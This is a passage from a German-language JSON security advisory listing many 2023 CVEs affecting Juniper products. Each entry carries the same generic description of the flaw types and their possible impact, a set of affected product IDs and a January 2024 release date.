auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2023-22081" }, { "cve": "CVE-2023-22049", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. 
Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2023-22049" }, { "cve": "CVE-2023-22045", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. 
Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2023-22045" }, { "cve": "CVE-2023-21968", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." 
} ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2023-21968" }, { "cve": "CVE-2023-21967", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2023-21967" }, { "cve": "CVE-2023-21954", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. 
Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2023-21954" }, { "cve": "CVE-2023-2194", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. 
Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2023-2194" }, { "cve": "CVE-2023-21939", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." 
} ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2023-21939" }, { "cve": "CVE-2023-21938", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2023-21938" }, { "cve": "CVE-2023-21937", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. 
Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2023-21937" }, { "cve": "CVE-2023-21930", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. 
Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2023-21930" }, { "cve": "CVE-2023-21843", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." 
} ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2023-21843" }, { "cve": "CVE-2023-21830", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2023-21830" }, { "cve": "CVE-2023-2124", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. 
Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2023-2124" }, { "cve": "CVE-2023-20593", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. 
Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2023-20593" }, { "cve": "CVE-2023-20569", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." 
} ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2023-20569" }, { "cve": "CVE-2023-1829", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2023-1829" }, { "cve": "CVE-2023-1582", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. 
Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2023-1582" }, { "cve": "CVE-2023-1281", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. 
Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2023-1281" }, { "cve": "CVE-2023-1195", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." 
} ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2023-1195" }, { "cve": "CVE-2023-0767", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2023-0767" }, { "cve": "CVE-2023-0461", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. 
Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2023-0461" }, { "cve": "CVE-2023-0394", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. 
